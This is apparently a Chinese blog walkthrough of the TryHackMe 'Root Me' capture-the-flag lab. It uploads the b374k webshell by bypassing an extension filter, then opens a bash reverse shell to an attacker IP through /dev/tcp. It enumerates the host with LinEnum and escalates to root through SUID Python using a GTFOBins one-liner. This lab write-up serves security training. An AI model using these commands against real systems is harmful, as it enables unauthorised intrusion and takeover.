[Day14] THM Root Me

扫描

上传 Webshell

  • /panel/ 可以上传档案
    • 用 Wappalyzer 可以确定他是 PHP
  • 这边我们来上传个多功能的 Web shell 玩玩ㄅ
  • 上传 b374k.php
  • 试着使用 Apache 文件解析的漏洞
    • 把档名改成 b374k.php.aaa
    • Google 翻译 :文件上传成功!

使用 Webshell

  • 点击下面的 Veja! 会跳转到 http://10.10.233.205/uploads/b374k.php.aaa
    • 使用预设密码 b374k 就能进入 shell

戳入 Reverse Shell

  • 终端机输入 nc -vlk 7877
    • webshell 的 Terminal 输入
      • bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'
    • 即可顺利连上 Reverse shell
  • 交互型 Reverse shell
    • python -c 'import pty; pty.spawn("/bin/bash")'
  • 取得 User Flag

提权

  • 使用内建的上传功能,上传 LinEnum.sh
    • 开启权限 chmod +x LinEnum.sh
  • 执行 LinEnum 并顺便输出到档案
    • ./LinEnum.sh | tee meow.txt
  • 寻找到有趣的东西
    • /usr/bin/python 有 SUID
  • GTFOBins 找 Python 有 SUID 的提权方法
    • python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
  • 提权成功

<<:  【心得】 会让人晕3D的transform

>>:  [Day14] Kubernetes

12.unity使用者输入(GetKey与GetButton)

今天试着了解如何让使用者输入,操作Input的形式,之後就能够利用Input的参数和碰撞触发的事件进...

[解题纪录] Love Song

题目 题目大意: 以题目的范例测试资料为例: 7 3 abacaba 1 3 2 5 1 7 第一行...

[FGL] 列出树状表所有节点路径的思路与实作

在ERP体系内,除了一般表格之外,就剩下树状结构了:部门组织、产品结构、销售网路等等,都是透过标定...

[Day24] NLP会用到的模型(七)-transformer encoder

一. encoder 架构如下: encoder的动作在於对input进行编码,在一开始input会...

Day 25 : 可解释的 AI - Explain AI (XAI)

AI 黑箱作业已经被诟病许久,因为 AI 类神经网络的复杂性不似机械学习的树状结构、线性结构容易理...